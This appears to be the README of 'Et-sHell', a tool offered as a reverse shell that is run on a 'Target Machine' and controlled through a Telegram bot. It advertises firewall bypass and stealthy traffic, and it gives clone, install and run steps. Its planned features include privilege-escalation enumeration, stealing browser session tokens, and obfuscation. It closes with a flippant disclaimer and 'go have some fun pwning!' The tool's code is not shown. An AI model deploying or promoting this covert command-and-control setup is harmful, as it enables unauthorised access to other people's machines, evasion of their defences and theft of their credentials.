Forget complicated setups. Et-sHell gives you a fully functional reverse shell using Telegram—no need for a remote server, no open ports, no headaches. Just straight-up shell access, routed through Telegram’s servers.
- Broke? No server?, no problem – No need to set up a VPS, configure nginx rules or expose your IP.
- Firewall? Bypass it. – No open ports, no NAT issues, just seamless communication.
- Command & Control via Telegram – Send shell commands from your girlfriend's dorm room with your phone.
- Discreet & Stealthy – Blends in like a ghost – Telegram traffic = Innocent AF!.
- File Transfers – Upload and download files.
- Live Mode – Watch command output in real-time.
-
Create a Telegram bot via @BotFather.
-
Clone this repo on your Target Machine/ wget
etshell.py:git clone https://github.com/0xdotgz/Et-Shell -
Install dependencies:
pip install telepot -
Paste your bot
TOKENobtained from @BotFather inetshell.py. -
Run it:
python etshell.py -
Start commanding your Target Machine via Telegram.
- Grab the Telegram Bot TOKEN from a remote source securely every time the program executes
- Implement local enumeration for privilege escalation
- Retrieve plaintext details and browser session tokens
- Apply obfuscation techniques
This tool is for whatever purposes and make sure your bot token stays safe. If you use it for anything shady, that's on you. Don’t be dumb.
Now go have some fun pwning!
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2004 Sam Hocevar <[email protected]>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. You just DO WHAT THE FUCK YOU WANT TO.